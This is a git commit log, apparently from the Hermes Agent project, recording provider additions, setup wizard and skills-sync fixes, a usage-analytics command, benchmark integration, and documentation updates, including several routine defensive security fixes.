  - Web: Firecrawl Cloud, Firecrawl Self-Hosted
  - Image Gen: FAL.ai
  - Browser: Browserbase
  - Smart Home: Home Assistant
  - RL Training: Tinker/Atropos
  - GitHub: Personal Access Token
- Shows configured status on each tool and provider
- Only prompts for API keys after provider selection

Also:
- Add section argument to setup argparse parser in main.py
- Update summary to show new section commands
- Add self-hosted Firecrawl and Home Assistant to tool setup
- All 2013 tests pass
2026-03-06 21:02:00 -08:00
PercyDikec
8bf28e1441 fix(setup): prevent OpenRouter model list fallback for Nous provider
When `fetch_nous_models()` fails silently during setup, the model
selection falls through to the OpenRouter static list. Users then pick
models in OpenRouter format (e.g. `anthropic/claude-opus-4.6`) which
the Nous inference API rejects with a 400 "missing model" error.

Add an explicit `elif selected_provider == "nous"` branch that prompts
for manual model entry instead of falling through to the generic
OpenRouter fallback.
2026-03-07 07:16:22 +03:00
teknium1
ce28f847ce fix: update OpenRouter model names for yc-bench config
Use anthropic/claude-sonnet-4.6 (OpenRouter format) instead of
anthropic/claude-sonnet-4-20250514 (direct API format).
2026-03-06 19:58:56 -08:00
stablegenius49
5609117882 fix(doctor): recognize OPENAI_API_KEY custom endpoint config 2026-03-06 19:47:09 -08:00
teknium1
b4fbb6fe10 feat: add YC-Bench long-horizon agent benchmark environment
Adds eval-only benchmark for YC-Bench (collinear-ai/yc-bench), a
deterministic long-horizon benchmark where the agent acts as CEO of an
AI startup over a simulated 1-3 year run.

Key design decisions verified against the official yc-bench repo:
- Uses 'sim init' (NOT 'yc-bench run') to avoid starting a competing
  built-in agent loop
- Correct DB table names: 'companies' and 'sim_events'
- Correct 4 domains: research, inference, data_environment, training
- Penalty values are preset-dependent (not hardcoded in system prompt)
- Sequential evaluation (each run is 100-500 turns)
- Follows TerminalBench2 patterns: KeyboardInterrupt handling,
  cleanup_all_environments(), tqdm logging handler, streaming JSONL

yc-bench added as optional dependency: pip install hermes-agent[yc-bench]

Closes #340
2026-03-06 19:25:56 -08:00
teknium1
82d7e9429e chore: add GLM/Kimi/MiniMax models to insights pricing (zero cost)
These direct providers don't return cost in API responses and their
per-token pricing isn't readily available externally. Treat as local
models with zero cost so they appear in /insights without fake estimates.
2026-03-06 19:12:14 -08:00
teknium1
e2821effb5 feat: add direct API-key providers as auxiliary client fallbacks
When the user only has a z.ai/Kimi/MiniMax API key (no OpenRouter key),
auxiliary tasks (context compression, web summarization, session search)
now fall back to the configured direct provider instead of returning None.

Resolution chain: OpenRouter -> Nous -> Custom endpoint -> Codex OAuth
-> direct API-key providers -> None.

Uses cheap/fast models for auxiliary tasks:
- zai: glm-4.5-flash
- kimi-coding: kimi-k2-turbo-preview
- minimax/minimax-cn: MiniMax-M2.5-highspeed

Vision auxiliary intentionally NOT modified — vision needs multimodal
models (Gemini) that these providers don't serve.
2026-03-06 19:08:54 -08:00
teknium1
9742f11fda chore: add context lengths for Kimi and MiniMax models
Adds DEFAULT_CONTEXT_LENGTHS entries for kimi-k2.5 (262144), kimi-k2-thinking
(262144), kimi-k2-turbo-preview (262144), kimi-k2-0905-preview (131072),
MiniMax-M2.5/M2.5-highspeed/M2.1 (204800), and glm-4.5/4.5-flash (131072).

Avoids unnecessary 2M-token probe on first use with direct providers.
2026-03-06 19:01:38 -08:00
Tyler
53b4b7651a Add official OpenClaw migration skill for Hermes Agent
Introduces a new OpenClaw-to-Hermes migration skill with a Python
helper script that handles importing SOUL.md, memories, user profiles,
messaging settings, command allowlists, skills, TTS assets, and
workspace instructions.

Supports two migration presets (user-data / full), three skill conflict
modes (skip / overwrite / rename), overflow file export for entries that
exceed character limits, and granular include/exclude option filtering.

Includes detailed SKILL.md agent instructions covering the clarify-tool
interaction protocol, decision-to-command mapping, post-run reporting
rules, and path resolution guidance.

Adds dynamic panel width calculation to CLI clarify/approval widgets so
panels adapt to content and terminal size.

Includes 7 new tests covering presets, include/exclude, conflict modes,
overflow exports, and skills_guard integration.
2026-03-06 18:57:12 -08:00
teknium1
388dd4789c feat: add z.ai/GLM, Kimi/Moonshot, MiniMax as first-class providers
Adds 4 new direct API-key providers (zai, kimi-coding, minimax, minimax-cn)
to the inference provider system. All use standard OpenAI-compatible
chat/completions endpoints with Bearer token auth.

Core changes:
- auth.py: Extended ProviderConfig with api_key_env_vars and base_url_env_var
  fields. Added providers to PROVIDER_REGISTRY. Added provider aliases
  (glm, z-ai, zhipu, kimi, moonshot). Added auto-detection of API-key
  providers in resolve_provider(). Added resolve_api_key_provider_credentials()
  and get_api_key_provider_status() helpers.
- runtime_provider.py: Added generic API-key provider branch in
  resolve_runtime_provider() — any provider with auth_type='api_key'
  is automatically handled.
- main.py: Added providers to hermes model menu with generic
  _model_flow_api_key_provider() flow. Updated _has_any_provider_configured()
  to check all provider env vars. Updated argparse --provider choices.
- setup.py: Added providers to setup wizard with API key prompts and
  curated model lists.
- config.py: Added env vars (GLM_API_KEY, KIMI_API_KEY, MINIMAX_API_KEY,
  etc.) to OPTIONAL_ENV_VARS.
- status.py: Added API key display and provider status section.
- doctor.py: Added connectivity checks for each provider endpoint.
- cli.py: Updated provider docstrings.

Docs: Updated README.md, .env.example, cli-config.yaml.example,
cli-commands.md, environment-variables.md, configuration.md.

Tests: 50 new tests covering registry, aliases, resolution, auto-detection,
credential resolution, and runtime provider dispatch.

Inspired by PR #33 (numman-ali) which proposed a provider registry approach.
Credit to tars90percent (PR #473) and manuelschipper (PR #420) for related
provider improvements merged earlier in this changeset.
2026-03-06 18:55:18 -08:00
Teknium
fdebca4573 Merge pull request #571 from NousResearch/rewbs/nous-key-remint-attempt-on-401
fix: implement Nous credential refresh on 401 error for retry logic
2026-03-06 18:52:01 -08:00
teknium1
479dfc096a Merge PR #473: Update model id in OpenRouter from minimax-m2.1 to minimax-m2.5
Authored by tars90percent. Updates remaining minimax-m2.1 references to
minimax-m2.5 in rl_training_tool.py and docs.
2026-03-06 18:43:18 -08:00
teknium1
3c6c11b7c9 Merge PR #420: fix: respect OPENAI_BASE_URL when resolving API key priority
Authored by manuelschipper. Adds GLM-4.7 and GLM-5 context lengths (202752)
to model_metadata.py. The key priority fix (prefer OPENAI_API_KEY for
non-OpenRouter endpoints) was already applied in PR #295; merged the Z.ai
mention into the comment.
2026-03-06 18:43:13 -08:00
Robin Fernandes
bc091eb7ef fix: implement Nous credential refresh on 401 error for retry logic 2026-03-07 13:34:23 +11:00
alireza78a
a857321463 fix(code-execution): close server socket in finally block to prevent fd leak 2026-03-07 05:49:48 +03:30
teknium1
f75b1d21b4 fix: execute_code and delegate_task now respect disabled toolsets
When a user disables the web toolset via 'hermes tools', the execute_code
schema description still hardcoded web_search/web_extract as available,
causing the model to keep trying to use them. Similarly, delegate_task
always defaulted to ['terminal', 'file', 'web'] for subagents regardless
of the parent's config.

Changes:
- execute_code schema is now built dynamically via build_execute_code_schema()
  based on which sandbox tools are actually enabled
- model_tools.py rebuilds the execute_code schema at definition time using
  the intersection of sandbox-allowed and session-enabled tools
- delegate_task now inherits the parent agent's enabled_toolsets instead of
  hardcoding DEFAULT_TOOLSETS when no explicit toolsets are specified
- delegate_task description updated to say 'inherits your enabled toolsets'

Reported by kotyKD on Discord.
2026-03-06 17:36:14 -08:00
0xbyt4
33cfe1515d fix: sanitize FTS5 queries and close mirror DB connections
Two bugs fixed:

1. search_messages() crashes with OperationalError when user queries
   contain FTS5 special characters (+, ", (, {, dangling AND/OR, etc).
   Added _sanitize_fts5_query() to strip dangerous operators and a
   fallback try-except for edge cases.

2. _append_to_sqlite() in mirror.py creates a new SessionDB per call
   but never closes it, leaking SQLite connections. Added finally block
   to ensure db.close() is always called.
2026-03-07 04:24:45 +03:00
teknium1
94053d75a6 fix: custom endpoint no longer leaks OPENROUTER_API_KEY (#560)
API key selection is now base_url-aware: when the resolved base_url
targets OpenRouter, OPENROUTER_API_KEY takes priority (preserving the
#289 fix). When hitting any other endpoint (Z.ai, vLLM, custom, etc.),
OPENAI_API_KEY takes priority so the OpenRouter key doesn't leak.

Applied in both the runtime provider resolver (the real code path) and
the CLI initial default (for consistency).

Fixes #560.
2026-03-06 17:16:14 -08:00
teknium1
2a68099675 fix(tests): isolate tests from user ~/.hermes/ config and SOUL.md
_make_cli() now patches CLI_CONFIG with clean defaults so
test_cli_init tests don't depend on the developer's local config.yaml.
test_empty_dir_returns_empty now mocks Path.home() so it doesn't pick
up a global SOUL.md.

Credit to teyrebaz33 for identifying and fixing these in PR #557.
Fixes #555.
2026-03-06 17:10:35 -08:00
0xbyt4
3b43f7267a fix: count actual tool calls instead of tool-related messages
tool_call_count was inaccurate in two ways:

1. Under-counting: an assistant message with N parallel tool calls
   (e.g. "kill the light and shut off the fan" = 2 ha_call_service)
   only incremented tool_call_count by 1 instead of N.

2. Over-counting: tool response messages (role=tool) also incremented
   tool_call_count, double-counting every tool interaction.

Combined: 2 parallel tool calls produced tool_call_count=3 (1 from
assistant + 2 from tool responses) instead of the correct value of 2.

Fix: only count from assistant messages with tool_calls, incrementing
by len(tool_calls) to handle parallel calls correctly. Tool response
messages no longer affect tool_call_count.

This impacts /insights and /usage accuracy for sessions with tool use.
2026-03-07 04:07:52 +03:00
teknium1
6cd3bc6640 Merge PR #563: fix: prevent data loss in skills sync on copy/update failure
Authored by 0xbyt4. Two bugs fixed:
1. Failed copytree no longer poisons the manifest (skill gets retried)
2. Failed update no longer destroys user's copy (backup + restore)
2026-03-06 17:01:30 -08:00
0xbyt4
211b55815e fix: prevent data loss in skills sync on copy/update failure
Two bugs in sync_skills():

1. Failed copytree poisons manifest: when shutil.copytree fails (disk
   full, permission error), the skill is still recorded in the manifest.
   On the next sync, the skill appears as "in manifest but not on disk"
   which is interpreted as "user deliberately deleted it" — the skill
   is never retried.  Fix: only write to manifest on successful copy.

2. Failed update destroys user copy: rmtree deletes the existing skill
   directory before copytree runs. If copytree then fails, the user's
   skill is gone with no way to recover.  Fix: move to .bak before
   copying, restore from backup if copytree fails.

Both bugs are proven by new regression tests that fail on the old code
and pass on the fix.
2026-03-07 03:58:32 +03:00
teknium1
8ae4a6f824 fix: improve handling of empty responses after tool calls
- Added fallback mechanism to utilize previous content when the model generates an empty response after tool calls, reducing unnecessary API retries.
- Enhanced logging to indicate when prior content is used as a final response.
- Updated logic to ensure that genuine empty responses are retried appropriately, maintaining user experience.
2026-03-06 16:54:31 -08:00
teknium1
b98301677a docs: add /insights to all help menus and documentation
- website/docs/reference/cli-commands.md: Added 'hermes insights' terminal
  command section with --days and --source flags, plus /insights slash command
  in the Conversation section
- website/docs/user-guide/cli.md: Added /insights to slash commands table
- website/docs/user-guide/messaging/index.md: Added /insights to gateway
  chat commands table
- website/docs/user-guide/sessions.md: Added cross-reference to hermes
  insights from the sessions stats section
2026-03-06 16:48:58 -08:00
teknium1
f2fdde5ba4 fix: show user-modified skills count in hermes update output 2026-03-06 16:14:43 -08:00
teknium1
4f56e31dc7 fix: track origin hashes in skills manifest to preserve user modifications
Upgrade skills_sync manifest to v2 format (name:origin_hash). The origin
hash records the MD5 of the bundled skill at the time it was last synced.

On update, the user's copy is compared against the origin hash:
- User copy == origin hash → unmodified → safe to update from bundled
- User copy != origin hash → user customized → skip (preserve changes)

v1 manifests (plain names) are auto-migrated: the user's current hash
becomes the baseline, so future syncs can detect modifications.

Output now shows user-modified skills:
  ~ whisper (user-modified, skipping)

27 tests covering all scenarios including v1→v2 migration, user
modification detection, update after migration, and origin hash tracking.
2009 tests pass.
2026-03-06 16:13:58 -08:00
Teknium
6d3804770c Merge pull request #552 from NousResearch/feat/insights
feat: /insights command — usage analytics, cost estimation & activity patterns
2026-03-06 16:00:28 -08:00
teknium1
ab0f4126cf fix: restore all removed bundled skills + fix skills sync system
- Restored 21 skills removed in commits 757d012 and 740dd92:
  accelerate, audiocraft, code-review, faiss, flash-attention, gguf,
  grpo-rl-training, guidance, llava, nemo-curator, obliteratus, peft,
  pytorch-fsdp, pytorch-lightning, simpo, slime, stable-diffusion,
  tensorrt-llm, torchtitan, trl-fine-tuning, whisper

- Rewrote sync_skills() with proper update semantics:
  * New skills (not in manifest): copied to user dir
  * Existing skills (in manifest + on disk): updated via hash comparison
  * User-deleted skills (in manifest, not on disk): respected, not re-added
  * Stale manifest entries (removed from bundled): cleaned from manifest

- Added sync_skills() to CLI startup (cmd_chat) and gateway startup
  (start_gateway) — previously only ran during 'hermes update'

- Updated cmd_update output to show new/updated/cleaned counts

- Rewrote tests: 20 tests covering manifest CRUD, dir hashing, fresh
  install, user deletion respect, update detection, stale cleanup, and
  name collision handling

75 bundled skills total. 2002 tests pass.
2026-03-06 15:57:30 -08:00
unmodeled-tyler
1755a9e38a Design agent migration skill for Hermes Agent from OpenClaw | Run
successful dry tests with reports
2026-03-06 15:12:45 -08:00
teknium1
585f8528b2 fix: deep review — prefix matching, tool_calls extraction, query perf, serialization
Issues found and fixed during deep code path review:

1. CRITICAL: Prefix matching returned wrong prices for dated model names
   - 'gpt-4o-mini-2024-07-18' matched gpt-4o ($2.50) instead of gpt-4o-mini ($0.15)
   - Same for o3-mini→o3 (9x), gpt-4.1-mini→gpt-4.1 (5x), gpt-4.1-nano→gpt-4.1 (20x)
   - Fix: use longest-match-wins strategy instead of first-match
   - Removed dangerous key.startswith(bare) reverse matching

2. CRITICAL: Top Tools section was empty for CLI sessions
   - run_agent.py doesn't set tool_name on tool response messages (pre-existing)
   - Insights now also extracts tool names from tool_calls JSON on assistant
     messages, which IS populated for all sessions
   - Uses max() merge strategy to avoid double-counting between sources

3. SELECT * replaced with explicit column list
   - Skips system_prompt and model_config blobs (can be thousands of chars)
   - Reduces memory and I/O for large session counts

4. Sets in overview dict converted to sorted lists
   - models_with_pricing / models_without_pricing were Python sets
   - Sets aren't JSON-serializable — would crash json.dumps()

5. Negative duration guard
   - end > start check prevents negative durations from clock drift

6. Model breakdown sort fallback
   - When all tokens are 0, now sorts by session count instead of arbitrary order

7. Removed unused timedelta import

Added 6 new tests: dated model pricing (4), tool_calls JSON extraction,
JSON serialization safety. Total: 69 tests.
2026-03-06 14:50:57 -08:00
teknium1
75f523f5c0 fix: unknown/custom models get zero cost instead of fake estimates
Custom OAI endpoints, self-hosted models, and local inference should NOT
show fabricated cost estimates. Changed default pricing from $3/$12 per
million tokens to $0/$0 for unrecognized models.

- Added _has_known_pricing() to distinguish commercial vs custom models
- Models with known pricing show $ amounts; unknown models show 'N/A'
- Overview shows asterisk + note when some models lack pricing data
- Gateway format adds '(excludes custom/self-hosted models)' note
- Added 7 new tests for custom model cost handling
2026-03-06 14:18:19 -08:00
teknium1
68fbae5692 docs: add Custom & Self-Hosted LLM Providers guide
Comprehensive guide for using Hermes Agent with alternative LLM backends:
- Ollama (local models, zero config)
- vLLM (high-performance GPU inference)
- SGLang (RadixAttention, prefix caching)
- llama.cpp / llama-server (CPU & Metal inference)
- LiteLLM Proxy (multi-provider gateway)
- ClawRouter (cost-optimized routing with complexity scoring)
- 10+ other compatible providers table (Together, Groq, DeepSeek, etc.)
- Choosing the Right Setup decision table
- General custom endpoint setup instructions

All of these work via the existing OPENAI_BASE_URL + OPENAI_API_KEY
custom endpoint support — no code changes needed.
2026-03-06 14:16:06 -08:00
teknium1
80f1dd8d37 docs: add Custom & Self-Hosted LLM Providers guide
Comprehensive guide for using Hermes Agent with alternative LLM backends:
- Ollama (local models, zero config)
- vLLM (high-performance GPU inference)
- SGLang (RadixAttention, prefix caching)
- llama.cpp / llama-server (CPU & Metal inference)
- LiteLLM Proxy (multi-provider gateway)
- ClawRouter (cost-optimized routing with complexity scoring)
- 10+ other compatible providers table (Together, Groq, DeepSeek, etc.)
- Choosing the Right Setup decision table
- General custom endpoint setup instructions

All of these work via the existing OPENAI_BASE_URL + OPENAI_API_KEY
custom endpoint support — no code changes needed.
2026-03-06 14:15:57 -08:00
teknium1
b52b37ae64 feat: add /insights command with usage analytics and cost estimation
Inspired by Claude Code's /insights, adapted for Hermes Agent's multi-platform
architecture. Analyzes session history from state.db to produce comprehensive
usage insights.

Features:
- Overview stats: sessions, messages, tokens, estimated cost, active time
- Model breakdown: per-model sessions, tokens, and cost estimation
- Platform breakdown: CLI vs Telegram vs Discord etc. (unique to Hermes)
- Tool usage ranking: most-used tools with percentages
- Activity patterns: day-of-week chart, peak hours, streaks
- Notable sessions: longest, most messages, most tokens, most tool calls
- Cost estimation: real pricing data for 25+ models (OpenAI, Anthropic,
  DeepSeek, Google, Meta) with fuzzy model name matching
- Configurable time window: --days flag (default 30)
- Source filtering: --source flag to filter by platform

Three entry points:
- /insights slash command in CLI (supports --days and --source flags)
- /insights slash command in gateway (compact markdown format)
- hermes insights CLI subcommand (standalone)

Includes 56 tests covering pricing helpers, format helpers, empty DB,
populated DB with multi-platform data, filtering, formatting, and edge cases.
2026-03-06 14:04:59 -08:00
aydnOktay
566aeaeefa Make skill file writes atomic 2026-03-07 00:49:10 +03:00
Himess
7a0544ab57 fix: three small inconsistencies across cron, gateway, and daytona
1. cron/jobs.py: respect HERMES_HOME env var for job storage path.
   scheduler.py already uses os.getenv("HERMES_HOME", ...) but jobs.py
   hardcodes Path.home() / ".hermes", causing path mismatch when
   HERMES_HOME is set.

2. gateway/run.py: add Platform.HOMEASSISTANT to default_toolset_map
   and platform_config_key. The adapter and hermes-homeassistant
   toolset both exist but the mapping dicts omit it, so HomeAssistant
   events silently fall back to the Telegram toolset.

3. tools/environments/daytona.py: use time.monotonic() for deadline
   instead of float subtraction. All other backends (docker, ssh,
   singularity, local) use monotonic clock for timeout tracking.
   The accumulator pattern (deadline -= 0.2) drifts because
   t.join(0.2) + interrupt checks take longer than 0.2s per iteration.
2026-03-06 16:52:17 +03:00
teknium1
d63b363cde refactor: extract atomic_json_write helper, add 24 checkpoint tests
Extract the duplicated temp-file + fsync + os.replace pattern from
batch_runner.py (1 instance) and process_registry.py (2 instances) into
a shared utils.atomic_json_write() function.

Add 12 tests for atomic_json_write covering: valid JSON, parent dir
creation, overwrite, crash safety (original preserved on error), no temp
file leaks, string paths, unicode, custom indent, concurrent writes.

Add 12 tests for batch_runner checkpoint behavior covering:
_save_checkpoint (valid JSON, last_updated, overwrite, lock/no-lock,
parent dirs, no temp leaks), _load_checkpoint (missing file, existing
data, corrupt JSON), and resume logic (preserves prior progress,
different run_name starts fresh).
2026-03-06 05:50:12 -08:00
teknium1
c05c60665e Merge PR #298: Make process_registry checkpoint writes atomic
Authored by aydnOktay. Companion to PR #297 (batch_runner). Applies the
same atomic write pattern (temp file + fsync + os.replace) to both
_write_checkpoint() and recover_from_checkpoint() in process_registry.py.
Prevents checkpoint corruption on gateway crashes. Also improves error
handling: bare 'pass' replaced with logger.debug(..., exc_info=True)
for better debugging.
2026-03-06 05:32:35 -08:00
teknium1
b4873a5de7 fix(setup): Escape skips instead of exiting, add control hints to all prompts
Previously pressing Escape in any setup wizard menu called sys.exit(1),
killing the entire wizard with no way to recover. Now:

- prompt_choice: Escape keeps the current default and moves on (prints
  'Skipped (keeping current)'). Shows '↑/↓ Navigate  Enter Select
  Esc Skip  Ctrl+C Exit' hint.
- prompt_checklist: Escape returns pre-selected items instead of empty
  list. Shows 'SPACE Toggle  ENTER Confirm  ESC Skip  Ctrl+C Exit'.
- prompt_yes_no: now catches KeyboardInterrupt/EOFError properly.
- Fallback number prompts also show control hints.

Ctrl+C still exits the wizard cleanly.
2026-03-06 05:27:11 -08:00
teknium1
913f8ce0a5 Merge PR #297: Make batch_runner checkpoint incremental and atomic
Authored by aydnOktay. Three improvements to batch_runner fault tolerance:
1) Atomic checkpoint writes (temp file + fsync + os.replace) to prevent
   corruption on crashes — same pattern as auth.py's _save_auth_store().
2) Incremental checkpoints after each batch result instead of only at end,
   so interrupted runs can resume with minimal progress loss.
3) Resume loads existing checkpoint state instead of initializing empty,
   preventing clobber of prior progress.

Conflict resolved: kept both the incremental checkpoint logic (PR) and
the batch worker error handling (HEAD) in the imap_unordered loop.
2026-03-06 05:16:31 -08:00
Himess
453e0677d6 fix: use regex for search output parsing to handle Windows drive-letter paths
The ripgrep/grep output parser uses `split(':', 2)` to extract
file:lineno:content from match lines. On Windows, absolute paths
contain a drive letter colon (e.g. `C:\Users\foo\bar.py:42:content`),
so `split(':', 2)` produces `["C", "\Users\...", "42:content"]`.
`int(parts[1])` then raises ValueError and the match is silently
dropped. All search results are lost on Windows.

Same category as #390 — string-based path parsing that fails on
Windows. Replace `split()` with a regex that optionally captures
the drive letter prefix: `^([A-Za-z]:)?(.*?):(\d+):(.*)$`.

Applied to both `_search_with_rg` and `_search_with_grep`.
2026-03-06 15:54:33 +03:00
teknium1
4a63737227 Merge PR #433: fix(whatsapp): replace Linux-only fuser with cross-platform port cleanup
Authored by Farukest. Fixes #432. Extracts _kill_port_process() helper
that uses netstat+taskkill on Windows and fuser on Linux. Previously,
fuser calls were inline with bare except-pass, so on Windows orphaned
bridge processes were never cleaned up — causing 'address already in use'
errors on reconnect. Includes 5 tests covering both platforms, port
matching edge cases, and exception suppression.
2026-03-06 04:52:25 -08:00
teknium1
3e93db16bd Merge PR #436: fix: use _max_tokens_param in max-iterations retry path
Authored by Farukest. Fixes #435. The retry summary in
_handle_max_iterations() hardcoded max_tokens instead of using
_max_tokens_param(), which returns max_completion_tokens for direct
OpenAI API (required by gpt-4o, o-series). The first attempt already
used _max_tokens_param correctly — only the retry path was wrong.
Includes 4 tests for _max_tokens_param provider detection.
2026-03-06 04:46:24 -08:00
teknium1
f863a42351 Merge PR #441: fix(gateway): return response from /retry handler instead of discarding it
Authored by PercyDikec. Fixes #440. _handle_retry_command called
_handle_message(retry_event) but discarded the return value, returning
None instead. Since only _process_message_background sends the response
via adapter.send(), this meant the agent would run (tool progress was
visible) but the final answer was silently dropped on all platforms.
2026-03-06 04:42:54 -08:00
teknium1
dc55f493be fix: add missing re.DOTALL to DeepSeek V3.1 parser (same bug as V3)
The V3.1 parser had the same issue — .*? without re.DOTALL fails to
match multi-line JSON arguments. Found during review of PR #444.
2026-03-06 04:41:47 -08:00
teknium1
936fda3f9e Merge PR #444: fix: add missing re.DOTALL flag to DeepSeek V3 tool call parser
Authored by PercyDikec. Fixes #443. Without re.DOTALL, the regex .*
doesn't match newlines, so multi-line JSON arguments (the normal case)
silently fail to parse. Every other parser in the codebase that matches
across lines already uses re.DOTALL.
2026-03-06 04:39:53 -08:00
teknium1
ecb8148a9f Merge PR #448: fix(cli): use correct dict key for codex auth file path in status output
Authored by PercyDikec. Fixes #447. The status display used
codex_status.get('auth_file') but get_codex_auth_status() in auth.py
returns the path under 'auth_store' (line 1220). This one-char key
mismatch silently dropped the auth file path from 'hermes status'.
2026-03-06 04:34:46 -08:00
teknium1
2dbbedc05a docs: rebrand messaging — 'the self-improving AI agent'
- Lead with the learning loop: autonomous skill creation, skill
  self-improvement, memory nudges, FTS5 session search, Honcho
  dialectic user modeling
- 'Runs anywhere' angle: 6 backends, serverless persistence with
  Daytona/Modal, not tied to your laptop
- 'Built by model trainers' replaces 'model-agnostic'
- Updated README tagline, feature table, subtitle
- Updated docs landing page hero, description, key features
- Updated docusaurus tagline and pyproject.toml description
2026-03-06 04:34:06 -08:00
teknium1
c30967806c test: add 26 tests for set_config_value secret routing
Verifies explicit allowlist keys, catch-all _API_KEY/_TOKEN patterns,
case insensitivity, TERMINAL_SSH prefix, and config.yaml routing for
non-secret keys. Covers the fix from PR #469.
2026-03-06 04:26:18 -08:00
teknium1
145f719d30 Merge PR #469: fix(config): route API keys and tokens to .env instead of config.yaml
Authored by ygd58. Fixes #465. Adds missing keys to allowlist and
catch-all patterns (_API_KEY, _TOKEN suffixes) for future-proofing.
2026-03-06 04:23:49 -08:00
Himess
32dbd31b9a fix: restrict .env file permissions to owner-only
save_env_value() writes API keys to ~/.hermes/.env but never sets file
permissions, leaving the file world-readable (0644). auth.py already
restricts auth.json to 0600 — apply the same treatment to .env.

Skipped on Windows where chmod is not effective.
2026-03-06 15:14:26 +03:00
teknium1
b89eb29174 fix: correct mock tool name 'search' → 'search_files' in test_code_execution
The mock handler checked for function_name == 'search' but the RPC
sends 'search_files'. Any test exercising search_files through the
mock would get 'Unknown tool' instead of the canned response.
2026-03-06 03:53:43 -08:00
teknium1
3670089a42 docs: add Daytona to batch_runner, process_registry, agent_loop, tool_context
Add daytona_image to batch_runner per-prompt container image overrides
so batch processing works with the Daytona backend. Update inline
comments in RL environment files (agent_loop, tool_context) and
process_registry docstrings to include Daytona in backend lists.
2026-03-06 03:49:59 -08:00
teknium1
3982fcf095 fix: sync execute_code sandbox stubs with real tool schemas
The _TOOL_STUBS dict in code_execution_tool.py was out of sync with the
actual tool schemas, causing TypeErrors when the LLM used parameters it
sees in its system prompt but the sandbox stubs didn't accept:

search_files:
  - Added missing params: context, offset, output_mode
  - Fixed target default: 'grep' → 'content' (old value was obsolete)

patch:
  - Added missing params: mode, patch (V4A multi-file patch support)

Also added 4 drift-detection tests (TestStubSchemaDrift) that will
catch future divergence between stubs and real schemas:
  - test_stubs_cover_all_schema_params: every schema param in stub
  - test_stubs_pass_all_params_to_rpc: every stub param sent over RPC
  - test_search_files_target_uses_current_values: no obsolete values
  - test_generated_module_accepts_all_params: generated code compiles

All 28 tests pass.
2026-03-06 03:40:06 -08:00
teknium1
8481fdcf08 docs: complete Daytona backend documentation coverage
Update all remaining files that enumerate terminal backends to include
Daytona. Covers security docs (bypass info, backend comparison table),
environment variables reference (DAYTONA_API_KEY, TERMINAL_DAYTONA_IMAGE,
container resources header), AGENTS.md (architecture tree, config keys),
environments/README.md, hermes_base_env.py field description, and various
module docstrings.

Follow-up to PR #451 merge.
2026-03-06 03:37:05 -08:00
teknium1
39299e2de4 Merge PR #451: feat: Add Daytona environment backend
Authored by rovle. Adds Daytona as the sixth terminal execution backend
with cloud sandboxes, persistent workspaces, and full CLI/gateway integration.
Includes 24 unit tests and 8 integration tests.
2026-03-06 03:32:40 -08:00
teknium1
efec4fcaab feat(execute_code): add json_parse, shell_quote, retry helpers to sandbox
The execute_code sandbox generates a hermes_tools.py stub module for LLM
scripts. Three common failure modes keep tripping up scripts:

1. json.loads(strict=True) rejects control chars in terminal() output
   (e.g., GitHub issue bodies with literal tabs/newlines)
2. Shell backtick/quote interpretation when interpolating dynamic content
   into terminal() commands (markdown with backticks gets eaten by bash)
3. No retry logic for transient network failures (API timeouts, rate limits)

Adds three convenience helpers to the generated hermes_tools module:

- json_parse(text) — json.loads with strict=False for tolerant parsing
- shell_quote(s) — shlex.quote() for safe shell interpolation
- retry(fn, max_attempts=3, delay=2) — exponential backoff wrapper

Also updates the EXECUTE_CODE_SCHEMA description to document these helpers
so LLMs know they're available without importing anything extra.

Includes 7 new tests (unit + integration) covering all three helpers.
2026-03-06 01:52:46 -08:00
teknium1
5ce2c47d60 docs: update all docs for optional-skills and browse command
Update 7 documentation files to reflect:
- optional-skills/ directory in all project structure trees
- 'hermes skills browse' in all CLI command listings
- '/skills browse' in all slash command references
- Three-tier skill placement (bundled → optional → hub)
- 'official' trust level in trust level tables
- Updated /skills description from 'Search, install...' to 'Browse, search...'

Files updated:
- CONTRIBUTING.md (skill classification, project tree, section title)
- AGENTS.md (project tree, Skills Hub description, source adapters list)
- website/docs/reference/cli-commands.md (CLI table, slash command table)
- website/docs/developer-guide/creating-skills.md (structure, classification, trust)
- website/docs/user-guide/features/skills.md (hub commands, trust table, slash commands)
- website/docs/user-guide/cli.md (slash command description)
- website/docs/developer-guide/architecture.md (project tree)
2026-03-06 01:46:34 -08:00
teknium1
f6f3d1de9b fix: review fixes — path traversal guard, trust_style consistency, edge cases
Address code review findings:

Security (Medium):
- Path traversal guard in OptionalSkillSource.fetch() — resolve() and
  validate that the path stays within optional-skills/ before reading

Bug fixes (Medium):
- Add 'builtin' to trust_style dicts in do_inspect() and
  _resolve_short_name() — official skills now show bright_cyan 'official'
  label consistently across all display functions (5/5 dicts fixed)

Edge cases (Low):
- Clamp page_size to [1, 100] in do_browse() to prevent ZeroDivisionError
- Update SkillMeta.source docstring to include 'official'
- Add browse command to optional-skills/DESCRIPTION.md
2026-03-06 01:40:01 -08:00
teknium1
ec0fe3242a feat: 'hermes skills browse' — paginated browsing of all hub skills
Add a browse command that shows all available skills across all registries,
paginated and sorted with official skills first.

Usage:
  hermes skills browse                    # all sources, page 1
  hermes skills browse --source official  # only official optional skills
  hermes skills browse --page 2           # page 2
  hermes skills browse --size 30          # 30 per page
  /skills browse                          # slash command in chat

Features:
- Official optional skills always appear first (★ marker, cyan styling)
- Per-source limits prevent overloading (100 official/github, 50 others)
- Deduplication by name preferring higher trust
- Sorted: official > trusted > community, then alphabetical
- Page navigation hints at bottom
- Source counts summary
- Works in both CLI and /skills chat interface
- Added 'official' as source filter option for search command too
2026-03-06 01:29:45 -08:00
teknium1
f2e24faaca feat: optional skills — official skills shipped but not activated by default
Add 'optional-skills/' directory for official skills that ship with the repo
but are not copied to ~/.hermes/skills/ during setup. They are:
- NOT shown to the model in the system prompt
- NOT copied during hermes setup/update
- Discoverable via 'hermes skills search' labeled as 'official'
- Installable via 'hermes skills install' with builtin trust (no third-party warning)
- Auto-categorized on install based on directory structure

Implementation:
- OptionalSkillSource adapter in tools/skills_hub.py (search/fetch/inspect)
- Added to create_source_router() as first source (highest priority)
- Trust level 'builtin' for official skills in skills_guard.py
- Friendly install message for official skills (no third-party warning)
- 'official' label in cyan in search results and skill list

First optional skill: Blackbox CLI (autonomous-ai-agents/blackbox)
- Multi-model coding agent with built-in judge/Chairman pattern
- Delegates to Claude, Codex, Gemini, and Blackbox models
- Open-source CLI (GPL-3.0, TypeScript, forked from Gemini CLI)
- Requires paid Blackbox AI API key

Refs: #475
2026-03-06 01:24:11 -08:00
teknium1
8c80b96318 chore: update OpenRouter model list
- Remove opus-4.5 and gpt-5.2
